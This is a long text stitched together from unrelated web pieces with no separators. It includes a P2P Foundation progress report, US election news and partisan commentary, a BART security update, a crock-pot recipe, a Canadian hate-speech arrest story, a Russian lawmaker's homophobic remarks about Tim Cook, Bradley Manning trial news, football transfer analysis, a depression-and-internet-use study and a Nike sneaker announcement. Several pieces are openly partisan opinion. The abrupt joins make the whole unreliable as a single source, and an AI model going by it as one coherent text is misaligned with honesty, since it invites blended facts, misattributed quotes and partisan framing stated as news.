The first such project is the creation of a commons-based reciprocity license or copyfair, which has received the endorsement of various activists, including legal experts, particularly in France (such as Lionel Maurel and Primavera de Filippi). We have created a network of interested parties, both experts and a dozen economic entities who are interested in the implementation of the license. We have run into funding issues to responsibly craft this license, but are committed to rewrite that license soon without funding.
The second project in the context of open cooperatism, is the creation of a commons-centric crypto currency for the cooperative commons, i.e. Faircoin. To this effect, we have aligned ourselves in a strategic partnership with the Catalan Integral Cooperative, and the fair.coop eco-system, which includes the use of the faircoin currency, has been launched this fall, with crucial cooperation from P2P Foundation associates in Catalonia and Madrid. We have been invited in the second half of April 2015 for more joint collaboration on this topic.
The second priority concerned the advancement of political and policy thinking around the commons transition.
The highlight was of course my participation, along with P2P Foundation network associates, such as John Restakis, as research director for the FLOK transition project in Ecuador. Other ‘p2p-f' participants were George Dafermos, and Janice Figueiredo.
For the first time in history a commons transition plan was produced, accompanied by 18 legislative proposals and a dozen pilot projects. While the execution of the FLOK project is momentarily (or for a longer time) stalled at the nation-state level, the Commons Transition Plan has been consulted by nearly 65k viewers on the floksociety.org site; influenced the crafting of the Lemoine report on the digital economy in France; and is already cited as a reference.
The most promising concrete project is the open agricultural machining project in Sigchos district. The committed mayor has bought 2,200 ha. of land for experimentation, nominated a ‘sustainable development' director, and with the help of an associate send there to assist in the planning , i.e. Kate Swade of Shared Assets, a full planning was set up, which includes a summer school process in the summer of 2015. The proposals are presently in process for funding by the SENESCYT innovation agency, but whatever outcome there, the mayor is committed to carry out this project.
After the final production in Ecuador itself, we continued working with the CTP as a reference for commons-oriented policy-making and political convergence. A 2 day workshop was organized with the assistance of the Reseaux Francophones des Communs, in la Bergerie, with French and Spanish commoners on September 22-23. This was followed by participation in a What the FLOK festival in Marseille (October 2-5), and a 10-day to Athens, Greece, which consisted of three workshops with cooperative/commons activist groups, one public lecture, and three workshops with Syriza officials, which were considered very successful by the organizers and the Nikos Poulantzas Institute. Being able to influence, or rather to open up to commons thinking, the new generation of transformative parties is high on my wishlist.
This work will continue with a visit in April 2015 to the Catalan Integral Cooperative, which will work on a civic transition towards the commons.
We have also carried out communication and publishing work, with the launch of an international website, commonstransition.org, and an ebook, will be available before the end of year or just after New Year, with the help of Stacco Troncoso, Ann Marie Utratel and Guy James of Guerilla Translation. Both will contain new versions of the Commons Transition Plan and the policy papers on the civic economy and the partner state, to make them more useful for a generic use outside of Ecuador. The papers are also already available. A full three months (and a half) of lectures and workshops was used for communication and diffusion of the FLOK and further commons transition efforts, in the fall.
One of the highlights of this trip was definitely visiting the ‘Tiers Lieux Open Source' in Lille, i.e. meeting great Ouishare activists like Simon Sarazin and collaborative coworking spaces like Coroutine and Mutualab, where you can feel that the new p2p and collaboration driven culture is taking shape.
In addition, the P2P Foundation has been able to hire a full-time assistant since October 2014, i.e. Kevin Flanagan, to strengthen the organizational capacity of the P2P Foundation. We have now introduced professional governance software, Loomio, as a organizational and governance tool.
The post-flok transition work has a particular potential in urban settings and we started a first cooperation with the Co-Manua project in Italy, looking forward to further cooperation in the future.
We very actively continued our generic communication about the commons economy:
– the wiki of the P2P Foundation now has 20k articles, which have been viewed 27,385,944 times. The audience of the blog is estimated to be 100k per month. We have been able to collect 160 references to public lectures in 2014; and 80 video recordings, with appearances for Dutch, Belgian and Ecuadorian TV stations.
The Flemish book, De Wereld Redden, 200 pages of conversations, with Jean Lievens, on p2p theory and transitions, continues to do well in the Flanders and a bit in the Netherlands; and will be published in France next spring, by Les Liens Qui Liberent.
With Vasilis Kostakis, I published “Network Society and Future Scenarios for a Collaborative Economy” co-authored by Vasilis Kostakis and Michel Bauwens. The scholarly book is published by Palgrave Macmillan.
With Penny Travlou and Stacco Troncoso we are working on a important list and directory of the 100 Women Who Are Co-Creating the P2P Society, the profiles of which will be published on our blog in 2015.
Here is a summary of the three strategic priorities of the P2P Foundation for 2015 and 2016:
* Stream 1: Co-creating and catalyzing the alternative eco-system for open and cooperative peer production, to enable reconstruction of economic and social power around the commons. This includes work on our Commons-Based Reciprocity License (or Copyfair License), Open Cooperativism and Phyles, to create ethical entrepreneurial coalitions that co-produce commons.
* Stream 2: Reclaiming political voice and power via bottom-up Assemblies of the Commons and Chamber of the Commons putting forward social charters, in conjunction with “top-down” progressive coalitions through existing political parties. These coalitions around the commons, or ‘the politics and policies of the commons', will further our efforts to implement Commons Transition Plans.
* Stream 3: Creating synergies between cooperative peer production and sustainability, i.e. showing how a transition to the new modes of production, governance and ownership can solve the ecological and climate crises.
Vice President Biden is doubling down on watchdog groups and others who are saying he made misleading remarks in a speech earlier this week regarding the Romney-Ryan rescue plan for Medicare – daring reporters to “fact check me.”
Biden put down the challenge during a speech Saturday, after saying as he did during his acceptance speech Thursday at the Democratic National Convention that GOP presidential nominee Mitt Romney and running mate Rep. Paul Ryan's plan would cut benefits immediately for 30 million seniors already collecting Medicare.
“I say to the press, fact check me,” a smiling Biden said to applause at a rally in Zanesville, Ohio,
The Romney Campaign took up the challenge within hours.
“Today, Vice President Biden said that he should be fact checked, and we agree,” said Romney campaign spokeswoman Amanda Henneberg. “The vice president knowingly and deliberately leveled false and discredited attacks. This is further proof that the Obama Campaign is unable and unwilling to talk honestly or substantively about the most important issues driving the country."
"In an attempt to distract from President Obama's failed record, including unemployment remaining over 8 percent, labor force participation falling to three-decade lows, and our national debt passing $16 trillion, Vice President Biden is once again advancing fabricated and disproven attacks on Mitt Romney and Paul Ryan," Henneberg added.
Biden's comment follows Romney pollster Neil Newhouse saying in late August, "We're not going to let our campaign be dictated by fact-checkers.”
The Romney campaign also on Saturday released a statement with fact-checks on statements Biden made relating to Romney's tax and Medicare plans, and claims from Biden that Romney shipped jobs overseas.
Biden and President Obama made other statements in their convention speeches on such topics as unemployment and Medicare that fact-checkers said also appear to be inaccurate or at least misleading.
Among the questionable remarks were Biden's argument that "after the worst job loss since the Great Depression we created 4.5 million private sector jobs in the past 29 months" – a frequent response by the Obama campaign when questioned about the slow economic recovery.
The Associated Press and others point out that statement is misleading because it counts jobs from the recession's lowest point to where employment began to grow again – excluding jobs lost earlier in Obama's term and masking that overall unemployment has increased over that period.
"Overall, roughly 7.5 million jobs were lost during the recession that began in December 2007 and ended officially in June 2009," according to the wire service.
The Associated Press also points out that Obama said in his speech that he wants to use money saved by ending the wars to build highways, schools and bridges.
However, the wars were largely financed by borrowing "so there is no ready pile of cash to be diverted to anything else," the wire service writes.
The group FactCheck.org listed eight instances in which either Biden or Obama "spun" facts during their speeches Thursday night in Charlotte, N.C.
The group point out that Obama boasted that "independent experts" found his economic plan would cut the deficit by $4 trillion over 10 years. However, one such analyst called a key element of the plan a ‘gimmick,' the group said.
Other examples include the president saying U.S. automakers are back on top of the world.
"Nope," writes FactCheck, pointing out that General Motors has slipped back to No. 2 and is headed for third place in global sales this year behind Toyota and Volkswagen.
The group said Biden misquoted Mitt Romney when he said the GOP presidential nominee "believes it's OK to raise taxes on middle classes by $2,000."
Romney in fact promises to lower middle-class taxes, FactCheck points out.
Still, Obama and Biden were not alone, fact-checkers also dissected Romney and running mate Rep. Paul Ryan' convention speeches a week earlier in Tampa, Fla.
FactCheck said it found just "a few bits of exaggeration and puffery" in the Romney speech, even citing a tweet by Bill Burton, a former Obama press secretary, saying likewise.
The group said Romney exaggerated about the loss of family income under Obama because some occurred 13 months he took office.
However, the group said Ryan, in his acceptance speeches, made "false claims" or gave “misleading statements” at least five times – among them were that president's health care law funnels money away from Medicare “at the expense of the elderly.”
FactCheck pointed out Medicare's chief actuary says the law "substantially improves" the system's finances and that Ryan has embraced the same savings.
Great news — Warren, Baldwin, Brown, some really good new and returning ones. Gillibrand of course. Not every Democrat will be as good, but maintaining control of the Senate is also important, and today the GOP paid a massive price for its complete takeover by crackpots. Wolcott is definitive on the GOP blowing two Senate races in states that MSNBC called for Romney three seconds after the polls called:
Memo to Republicans: Try running fewer rape philosophers next time.
By the way, when was the last time Dick Lugar cast a meaningful non-wingnut vote? He was basically primaried for having an excessively moderate tone.
…and the white supremacist the GOP ran in Virginia was just declared a loser by CBS.
…not surprising:
There's no doubt about it: Republican Todd Akin's remark that women's bodies have a way of preventing pregnancy after “legitimate rape” were being factored in by Missouri voters. A solid majority of voters said that, at the very least, they gave the comment some consideration in the voting booth. Women were slightly more likely to say that Akin's remark on rape and abortion in an August television interview was important to their decision. Democratic Sen. Claire McCaskill isn't just carrying the female vote but faring even better than she did with women in 2006. McCaskill's comfortable edge among women was propelled by women 18-44 who overwhelmingly lined up behind the first-term incumbent, as did a significant number of middle-aged women who made up most female voters.
…Pierce on Warren.
There he goes again.
Morning Joe co-host and fake rock star Joe Scarborough begged new White House Chief of Staff John Kelly on Monday to “sideline” White House Chief Strategist Steve K. Bannon because Bannon encourages Trump to attack the “fake news” media and support pro-nationalist policies.
Scaraborough was upset that Bannon referred to Scarborough's elite pals in the media who think he is an actual rock star and has a cool haircut as “the enemy.” He was also apparently furious that Bannon was concerned about the Deep State even though nearly two-thirds of Americans, according to a recent Harvard-Harris poll, believe that there “exists campaign to delegitimize” Trump. Scarborough's new friends at Harvard also found that a majority of Americans believe the “Deep State” is using leaks to “unseat” Trump.
“I hate to keep going back to one of my themes over the past six months, but it is so important that Steve Bannon is sidelined. It's so important that general Kelly sidelines Steve Bannon, who plays to Donald Trump's worst instincts,” Scarborough told his fellow media elites on Monday.
Scarborough is also apparently upset that Bannon actually encourages Trump to attack and defeat Scarborough's poor friends in the legacy media who have tried to undermine and delegitimize Trump since his historic victory, never giving Trump credit for doing what they all thought was more impossible than Kirk Gibson's 1988 World Series home run on one leg off of all-world closer Dennis Eckersley. That, to Scarborough, is encouraging Trump's “worst instincts.”
Pobrecita!
Scarborough wants to turn Trump into a version of himself, Jon Hunstman, John Hickenlooper, John Kasich or any other candidate who can only win Scarborough's “No Labels/St. Albans” primary of 378 or so media elites and insufferable “thinkers” and “influencers” who mistake “sounding smart” for actual knowledge.
Of course, such a candidate would get clobbered in a general election, which is why Scarborough may want to sabotage Trump and convince him to embrace policies that Trump's enemies in the “fake news” media support.
Scarborough always throws tantrums when Trump keeps his campaign promises. For instance, after Trump withdrew the United States from the Paris Climate Accord, Scarborough almost lost his mind, repeatedly saying “President Bannon” on the air like a maniac even though Bannon has been described simply as Trump's “soldier” who has always defended Trump—whether it was after Trump's announcement when Trump attacked illegal immigrants from Mexico or after the release of Trump's Access Hollywood tapes—when everyone else was running as far away from Trump as possible.
Democratic presidential candidate Hillary Clinton argued that “people should and do trust me” and blamed a “constant barrage of attacks” by the right for her numbers in an interview with CNN broadcast on Tuesday.
Hillary was asked about her trust numbers, she answered, “Well, I think when you are subjected to the kind of constant barrage of attacks that are largely fomented by and coming from the right –.” She added, “I can only tell you that I was elected twice in New York against the same kind of onslaught, I was confirmed and served as secretary of state. And I think it's understandable that when questions are raised, people maybe are thinking about them, and wondering about them, but I have every confidence that during the course of this campaign people are going to know who will fight for them, who will be there when they need them, and that's the kind of person I am, and that's what I will do, not only in a campaign, but as president.”
She later argued, “this has been a theme that has been used against me and my husband for many, many years. And at the end of the day, I think voters sort it all out. I have great confidence. I trust the American voter, so I trust the American voter 100%, because I think the American voter will weigh these kinds of accusations. I mean, you know, people write books filled with unsubstantiated attacks against us, and even admit they have no evidence. But, of course, it's your job to cover it, so of course, that's going to raise questions in people's minds, but during the course of this campaign, just as in my two prior campaigns, and in my other years of service, I have a lot of confidence that the American people can sort it all out.”
Hillary concluded, “people should and do trust me and I have every confidence that that will be the outcome of this election. I cannot decide what the attacks on me will be, no matter how unfounded. And I'm well aware of the fact that it's your job to raise those and we'll do our best to respond to them. But I think what people talk to me about, and that's all I can go on, is the literally thousands of people that I've seen in the course of this campaign, they want to know what I'm going to do for the economy, what I'm going to do for education, what I'm going to do for healthcare, and they trust me to have a plan, and to be committed to carrying out that plan, and they should, because I will.”
Follow Ian Hanchett on Twitter @IanHanchett
Bay Area transit: BART, Muni increase security SECURITY
BART Police officers J. Barnes (l to r) and Richard Jacobson board a BART train while on patrol in Oakland, Calif., Monday, May 2, 2011. BART Police officers J. Barnes (l to r) and Richard Jacobson board a BART train while on patrol in Oakland, Calif., Monday, May 2, 2011. Photo: Lea Suzuki, The Chronicle Photo: Lea Suzuki, The Chronicle Image 1 of / 5 Caption Close Bay Area transit: BART, Muni increase security 1 / 5 Back to Gallery
Passengers on the Bay Area's busiest transit systems and at San Francisco International Airport may notice more police officers as the agencies take precautions against potential terrorist responses to the killing of Osama bin Laden.
But neither air travelers nor transit riders should encounter any new security procedures, officials said.
Muni and BART, the region's largest transit systems, are putting more officers on trains and in stations, and have been in contact with the Transportation Security Administration. No threats have been made against either agency, nor against U.S. transit systems in general, but many of the nation's large transit operators, including those in New York, Chicago, Los Angeles and Washington, are taking precautions.
Homeland Security Secretary Janet Napolitano said Monday that the agency would not issue an alert at this time. Abroad, U.S. embassies and other foreign facilities were placed on high alert, and strong admonitions were issued against U.S. citizens to be careful if traveling or living overseas.
BART canceled a training session for its Critical Asset Patrol Team of seven officers specially trained in counterterrorism Monday, and brought in extra officers to bolster its forces. The officers are walking trains and stations to provide a visible deterrent. The transit agency has also deployed its transportation supervisors, wearing neon green vests, to assist customers and provide extra eyes and ears.
"If you have seen anything suspicious, please let us know," said spokesman Linton Johnson.
Sgt. Edgardo Alvarez, who oversees the special patrol team, said passengers should be on the lookout for abandoned luggage or packages and "people acting differently than the average commuter." That could include someone wearing overly bulky clothing in warm weather or with a tangle of wires under their jacket, he said.
Muni is also deploying extra officers throughout its system, spokesman Paul Rose said.
Both BART and Muni said the stepped-up patrols would continue indefinitely.
Other transit agencies, including Caltrain, the Capitol Corridor, the Altamont Commuter Express and AC Transit either declined to discuss security efforts or said they had not made any changes. All said they've been in contact with the TSA.
At San Francisco International Airport, spokesman Mike McCarron said air travelers won't notice any different procedures at security checkpoints, but will likely see additional police officers inside the terminals.
For an added boost to Autumn, try this edible and amazing-smelling concoction that will fill your home with comforting and stress-alleviating smells. This is not as much as recipe as a framework of ideas for making your very own elixir that you can have going in your crock pot all day during the Holidays.
Save the rinds from any oranges you and your family may eat (in a zip lock bag in the freezer) and just pop them in the crock pot when you're ready to try this “brew.” You can use any citrus, but for the fall smell we like oranges the best. For a different smell – rosemary and lemon are also our favorites!
What a fantastic way to make your house smell awesome. This recipe has all the flavors and smells of Autumn. The smell will float through your home. If you love the smell of cinnamon, add a pinch or two more. This can stew all day long, just make sure to add cider and/or water as the day goes along if the water level gets low.
Base: Apple Cider or Apple Juice
Large Stuff: Apples, cut into slices, an Orange, sliced into quarters, Orange rinds saved throughout the season, Cinnamon Sticks, Cranberries. (peaches, pears, and you get the idea…)
Extras: Cloves, Star Anise, Allspice, Rosemary, Berries, Candied Ginger, Rosehips, Nutmeg, Bay leaves. (pick your favorite spices, but remember that in berry or raw form will break down much better in a crock pot. Adding just the powdered spice will infuse quickly and will not last as long)
Instructions: Pick your ingredients, and cook on high for a jump start. Then switch to Medium or Low and cook all day. Add more cider, or some water, as the liquid evaporates.
Tips: For best results, wait for about an hour before tasting. As an added bonus, try with your favorite liqueur or Rum.
Police in the Toronto suburb of Peel are charging a local man who was concerned with Muslim students being granted special Friday prayer time with “wilful promotion of hatred against an identifiable group.”
CBC News reports that Kevin Johnston made news a few months ago when he offered a $1,000 reward to anyone who could provide video of Muslim students “spewing hate speech during Friday prayers.” Police say Johnston was arrested for “numerous incidents” and won't say if the YouTube video is one of those but that the charge “concerns over information published on various social media sites.”
The Peel region has been the focus of numerous school board protests because Muslim students are allowed to conduct Friday prayer services in Arabic and many parents are concerned that these events are potential focal points for radicalization.
Peel police Sgt. Josh Colley told CBC Toronto that Johnston was arrested after a five-month investigation that apparently focused on “messaging” that the police considered hateful.
“It's not a private message that he was conveying, it was a public message … Anyone could hear, understand the messaging, so that's where the communicating hateful messages comes into play,” Colley said. Even though the “the group that was targeted was the Muslim community,” Colley said that “affects us all.”
The Ontario government has already branded the opponents of the Muslim school prayers as racists and Islamophobes. In March, two cabinet ministers issued a public statement in support of the Muslim prayer days. “I have met with the leadership of Peel and have obviously been very concerned about what I've seen and heard,” said Education Minister Mitzie Hunter in a joint statement with Children and Youth Services Minister Michael Coteau. Later, she told reporters in Toronto, “It felt important to Minister Coteau and I to really reinforce our expectations … there's just no tolerance for discrimination of any sort. We don't tolerate issues of racism and Islamophobia.”
The school prayers have become an issue because local imams are invited to pray and speak to the students in Arabic, and the school board cannot provide assurances that the students are not being subjected to radical Islamic indoctrination.
Prime Minister Justin Trudeau commented on the YouTube video in April, saying critics of Muslims having special Friday prayer sessions need “to ensure that everyone understands [and respects] their neighbors.”
He further claimed that “Canadians have understood that our differences are a source of strength, not a source of weakness” at a news conference just outside of Toronto.
Follow David on Twitter
Russia should give Apple CEO Tim Cook a lifetime entry ban for announcing that he identifies as gay, a prominent Russian anti-LGBT lawmaker has said.
“What could he bring us? The Ebola virus, AIDS, gonorrhea? They all have unseemly ties over there,” St. Petersburg city council member Vitaly Milonov told the FlashNord website on Thursday. “Ban him for life.”
Read More At:
http://www.buzzfeed.com/maxseddon/russian-official-says-apple-ceo-should-be-banned-from-russia
Clip from the Friday, October 31st 2014 edition of The Kyle Kulinski Show, which airs live on Blog Talk Radio and Secular Talk Radio monday – friday 4-6pm Eastern.
Check out our website – and become a member – at:
http://www.SecularTalkRadio.com
Listen to the Live Show or On Demand archive at:
http://www.blogtalkradio.com/kylekulinski
Follow-on Twitter:
http://www.twitter.com/kylekulinski
Like on Facebook:
http://www.facebook.com/SecularTalk
Friends Of SecularTalk:
http://www.facebook.com/beastofreason
AMAZON LINK: (Bookmark this link to support the show for free!!!)
http://www.amazon.com/?tag=seculacom-20
The defense team for WikiLeaks suspect Bradley Manning is seeking to depose several witnesses that the court refused to allow at a pretrial hearing last month in an apparent effort to undermine the government's charges that Manning leaked damaging classified information.
Attorney David E. Coombs is seeking to depose six witnesses (.pdf) who were involved in determining the classification level of materials that Manning is alleged to have leaked to WikiLeaks.
Coombs writes in his request to the Army Court that the witnesses were "essential" to the proceeding and should have been allowed to testify at Manning's pretrial hearing. Only 12 of some 48 witnesses that the defense requested appeared at the hearing after the court rejected most of the defense witnesses on grounds that they would present irrelevant testimony or testimony that was redundant to statements that government witnesses were expected to make. Defense witnesses who were also on the government's witness list were allowed to appear.
Although the names of the witnesses are redacted in the deposition request, they include someone who conducted a classification review of three Army Apache gun videos and who is expected to state that none of the videos were classified at the time they were allegedly leaked, according to Coombs.
Manning is suspected of providing at least two Army videos to WikiLeaks – one, the so-called "Collateral Murder" video that WikiLeaks published in April 2010, and another known as the "Garani airstrike video," which WikiLeaks claims it possesses but has never released. Mention of a third video, also related to the Garani airstrike incident, appeared in testimony at Manning's pre-trial hearing. The latter video was described not as a combat video, however, but as a reconnaissance video that simply showed footage taken from an airship flying over a combat region.
Other witnesses requested for oral deposition conducted classification reviews of two PowerPoint slide presentations, U.S. State Department cables and databases containing hundreds of thousands of records pertaining to the Iraq and Afghanistan wars. Coombs wants to question them about how they made their classification determinations as well as the impact the leaking of the documents had on national security.
Coombs made it clear in his statements at the pre-trial hearing that part of his defense strategy was aimed at mitigating Manning's punishment by showing that the leaks had no substantial impact on the nation's security.
Andreas Christensen will no doubt spend Thursday morning analysing whether he could have done more to stop Roma's three goals, but Chelsea must put their faith in the brilliant young Dane to learn on the job.
Having conceded three goals at home to Roma, Chelsea head coach Antonio Conte may well be tempted to go back to his old heads against Watford in the Premier League on Saturday.
But this is in fact the perfect time for Conte and Chelsea to prove they are willing to invest in Christensen and show young players can be given the time and patience to flourish at Stamford Bridge.
The first goal, which deflected off him from an Aleksandar Kolarov shot, was simply unlucky for Christensen. The second, which Edin Dzeko brilliantly volleyed into the net, was a lesson in how the top strikers prey on just the smallest of errors.
Dzeko then got in between Christensen and Cesar Azpilicueta to head Roma's third, but this was by no means a night to forget for the 21-year-old.
Researchers hope that discovered correlations will lead to software tools that will help identify users' symptoms of depression. iStockphoto
(CNET) The amount and type of online activity Internet users exhibit may be indicators of depression, findings a group of researchers hopes will lead to software tools to help identify depressive behavior.
People who showed symptoms of depression tended to use the Internet differently than those who didn't show signs of depression, researchers said in a New York Times opinion piece today. Some of that behavior included obsessively checking e-mail, watching lots of videos, and switching frequently among multiple apps, according to a new study by researchers from the Missouri University of Science and Technology.
The researchers asked 216 college students to complete a questionnaire to determine whether they were depressed, then asked the school's information technology department to examine how the students spent their time on the Internet.
"This didn't mean snooping on what the students were looking at or whom they were e-mailing; it merely meant monitoring how they were using the Internet - information about traffic flow that the university customarily collects for troubleshooting network connections and such," the researchers said.
They then conducted a statistical analysis of the depression scores and Internet usage patterns. Researchers found a correlation between high depression scores and greater instances of sharing files such as music and movies.
Another finding was that participants with depression symptoms tended to engage in high e-mail usage, although the researchers noted that previous research has shown that frequent e-mail checking may relate to high levels of anxiety.
"Earlier studies have looked into the relationship between Internet usage and depression, but ours is thought to be the first to use actual Internet data, collected anonymously and unobtrusively, rather than student-completed surveys about Internet usage, which are less reliable," the researchers said.
The hope is that this data can be used to develop software that can be installed on PCs and mobile devices to monitor Internet usage and alert users if usage patterns suggest symptoms of depression, researchers said.
"This would not replace the function of mental health professionals, but it could be a cost-effective way to prompt people to seek medical help early," they said. "It might also be a tool for parents to monitor the mood-related Internet usage patterns of their children."
The study is expected to be published soon in an upcoming issue of IEEE Technology and Society Magazine.
This article first appeared at CNET.
Fans of the "Back to the Future" film franchise have likely been counting the days until time machines, hoverboards and flying cars are a reality, but at least one of Marty McFly's futuristic gadgets — self-lacing sneakers — could soon inject a little innovation into your wardrobe.
Nike has announced it will begin selling self-lacing sneakers later this year. The new HyperAdapt 1.0 shoes will feature so-called adaptive lacing, which could offer a more comfortable experience for runners.
"When you step in, your heel will hit a sensor and the system will automatically tighten," Tiffany Beers, a senior innovator at Nike, Inc., and the project's technical lead, said in a statement. "Then there are two buttons on the side to tighten and loosen. You can adjust it until it's perfect." [10 Technologies That Will Transform Your Life]
Nike said the HyperAdapt 1.0 shoes are the culmination of extensive digital-, electrical- and mechanical-engineering research, and the finished product will not only solve existing problems with fit, but could also lead to revolutionary advances in adaptive performance. In other words, people can customize the shoes to fit their individual preferences, and athletes can also manually make modifications while wearing the sneakers.
"It is amazing to consider a shoe that senses what the body needs in real time," Nike designer Tinker Hatfield, who has designed some of the company's most popular sneakers, including many in the Air Jordan and Nike Air Max lines, said in a statement. "That eliminates a multitude of distractions, including mental attrition, and thus truly benefits performance."
For example, the shoes could make micro adjustments on the fly. Runners who accidentally tie their shoes too tightly will no longer have to stop to relieve the pressure. Alternatively, those who fail to tie their shoes tightly enough and find their feet slipping around inside their running shoes will be able to remedy the problems without slowing their pace.
"That's an important step, because feet undergo an incredible amount of stress during competition," Hatfield said. [7 Common Exercise Errors and How to Fix Them]
Beers and Hatfield are spearheading the project, and one of their earliest ideas included a snowboarding boot with an external generator. While the technology is too cumbersome to be practical, Beers and Hatfield have since refined it to be compact enough to fit within a running shoe, robust enough to stand up to everyday wear and tear, and flexible enough to move with an athlete's body.
"It's a platform," Beers said, "something that helps envision a world in which [the] product changes as the athlete changes."
The designers see the HyperAdapt 1.0 (as the "1.0" in its name suggests) as a first step in the field of adaptive performance. While the shoes are currently manual — meaning the athlete still controls the modifications — the technology opens up new possibilities for how sneakers could function almost seamlessly with a person's feet, Hatfield said.
"Wouldn't it be great if a shoe, in the future, could sense when you needed to have it tighter or looser?" Hatfield said. "Could it take you even tighter than you'd normally go if it senses you really need extra snugness in a quick maneuver? That's where we're headed. In the future, [the] product will come alive."
Nike's HyperAdapt 1.0 shoes will be available exclusively to Nike+ members during the 2016 holiday season. The company has not released additional information about the product's price, or when the shoes would be widely available for consumers.
Copyright 2016 LiveScience, a Purch company. All rights reserved. This material may not be published, broadcast, rewritten or redistributed.
It's official: Dortmund have saved the Bundesliga! Or are ruining it for everyone who is not them and Bavaria – take your pick. An already impressive summer transfer window has been bolstered to devastating effect in the past few days, with German internationals Mario Götze and André Schürrle joining BVB for a combined €56m.
This adds to the captures of the young prospects Mikel Merino, Emre Mor, Raphaël Guerreiro and Ousmane Dembélé, captured from Osasuna, Nordsjaelland, Lorient and Rennes respectively. BVB also added the slightly more experienced pair of former Barcelona man Marc Bartra – his transfer was covered earlier in the month here – and of course Sebastian Rode, a man who needs little introduction to readers of the site.
Key losses
Thomas Tuchel's men looked to be in a somewhat sticky situation this summer. Before the window even opened, key players such as Mats Hummels and Ílkay Gündoğan had already departed for huge fees. Henrikh Mkhitaryan followed a few weeks ago, heading to Jose Mourinho's new look Manchester United. In fact, the situation wasn't so much sticky, as a state of seeming disarray.
It is clear that the first team is weaker as a result of the departures of Hummels, Gündoğan and Mkhitaryan. Signing Götze is arguably an improvement on Mkhitaryan, assuming the World Cup winner re-finds his pre-Bayern form, but Bartra, while talented, lacks the experience of Hummels in defence, and Gündoğan is of a slightly higher caliber to Ride. However, while in terms of immediate replacements, Dortmund have essentially plugged gaps, it's hard to ignore that, with a further five signings, the net effect on the squad is a positive one.
Strength in numbers
Where before, Dortmund have had to play a very similar team week-in, week-out – for example, the prodigious Julian Weigl had to play 51 (fifty-one!) first team matches in his first season of top flight football last year, while injury-prone players like the aforementioned Gündoğan and Marco Reus, among others, virtually played every game possible while fit – they should now be able to rotate without a noticeable drop-off in quality. Modern football is largely a squad game, with the best teams able to account for the loss of players across the pitch.
Do we just increase the number of teams allowed in the Bundesliga and field two of them or what? pic.twitter.com/td7LbKu9rN — Luca Gierl (@LucaGierl) July 22, 2016
As Yellow Wall writer Luca Gierl points out, Dortmund are now able to field two very competitive Bundesliga first elevens. With BVB facing the triple threat of going deep in Europe, the DFB-Pokal and a Bundesliga title challenge, this will be invaluable. We asked Luca about the importance of this new-found squad depth. “While they lost their three best players, this gives the team a better chance to win more regularly in the not so big matches, while being able to rest some of the key players”, he said. “This could come in handy in the Bundesliga.”
Perhaps the most impressive thing about Bayern's success in recent years is that their level has been relentless: it doesn't matter if the Rekordmeister have played away in Russia or some other far-flung European country on Wednesday; by Saturday they're invariably going to beat whichever opposition they're put up against, because they have enough players to rest tired legs throughout the season.
Additionally, Bayern have continued to bag results through injury crises in recent years, which almost means that you can't have sympathy for the coach's selection problems with three points still pretty much secured anyway. Compare that to Dortmund's plight in 2014/15, when several key players were out with long term injuries, and a squad is not dissimilar to the double winning team of 2012 and Champions League finalists of 2013 found themselves mired at the bottom of the Bundesliga halfway through the season.
A change of tactics
That shouldn't happen now. This transfer window marks a return to a policy which brought about the sort of success that made Dortmund, for a brief couple of years, the best football team in Germany. Between 2009 and 2011, Dortmund signed Mats Hummels, Sven Bender, Kevin Großkreutz, Shinji Kagawa, Mitch Langerak, Moritz Leitner, Robert Lewandowski, Ivan Perisic, and Ílkay Gündoğan – their average age was just 20, and the majority became key players for BVB.
The policy changed somewhat in the intervening five years; Dortmund seemed to prefer to add a little experience to their ranks, with the likes of Adrián Ramos, Gonzalo Castro, Joo-Ho Park (all 28 at the time of signing) joining with the likes of Sokratis (25), Henrikh Mkhitaryan, Ciro Immobile, Kevin Kampl, Roman Bürki, Pierre-Emerick Aubameyang (all 24) and a genuine star in Marco Reus (23). Matthias Ginter also joined, aged 20, but he had played almost 100 professional games for previous club Freiburg.
Luca doesn't see this window's policy as a drastic change, however. “It is not really a change in policy, but rather a more expensive way of continuing what we already did. One the one hand signing some of the highest rated youngsters in the world, something we've tried to do for a long time, and on the other, trying to get some good proven players who are still young enough to develop some more. It's just that Dortmund had more money this time around than they usually have.”
There is certainly a hope with the likes of Guerreiro, Mor, Merino and Dembélé that they could prove as successful as Klopp's main men. There are hopes that the likes of Christian Pulisic and Felix Passlack might emulate Götze in the Klopp era and become stars from the youth academy, too. A couple of older players – Lucas Barrios and Lukas Pisczcek, for example, also made their way to Dortmund's first team in that period, in much the same way Rode and Bartra have joined Dortmund this year.
A slight change in the formula means that Dortmund have actually re-signed an outright star in Mario Götze, and a German international in André Schürrle, too. Re-signing Götze might be seen as a similar step to getting Nuri Şahin and Kagawa back from Real Madrid and Manchester United after botched moves, but is arguably even more important given the level of talent he is known to possess.
Both Götze and Schürrle have had a tough few years after burning so brightly in their early careers, but Götze's best years were his early ones at Dortmund, while Schürrle's were arguably under Tuchel at Mainz. Returning to a familiar setting in two different senses of the phrase could actually make the combined €56m look like a good deal for the pair. From the raft of signings around Götze and Schürrle's age between 2011 and 2016, only Reus was a star at the time of signing, while Aubameyang and Mkhitaryan developed into them after signing.
A new future for the Bundesliga?
But what does this all mean? Essentially, that Dortmund have had their best transfer window since they shocked everyone and stormed to the title in 2011, and that they have widened an already seismic gap between them and the rest of the Bundesliga, to create a sense that the Bundesliga now has a pretty much unassailable duopoly.
That's right: a duopoly. Fans and critics of the league alike claim that Bayern are the only team who can realistically win the Bundesliga and, as such, hold a monopoly over the league. It's partly true, but Dortmund's steps this window have certainly moved us a step closer to having a title race, whether it comes this year or in the next couple of seasons.
This is of course a contentious claim, but Dortmund are perhaps the first of Bayern's many challengers – running through Mönchengladbach of the 1970s, through Hamburg, Dortmund themselves in the 1990s and Bremen to Leverkusen and Stuttgart – to actually consolidate their position as the second force in German football with a second, potentially more talented generation. There are few German clubs with the resources of Dortmund: they have the best attended games in the league, and are the only club aside from Bayern who can afford to drop in excess of €110m on transfers in a single window.
Despite the positive signs, Luca has a “tough time seeing Dortmund as a challenger for the title this season”, because “the loss of quality is huge and players like Götze first have to gain back some of the form they once had”. That counts for Schürrle and Rode, too, while the rest of Dortmund's signings first have to acclimatize to German football. This season, make no bones about it, is still one of transition for Dortmund.
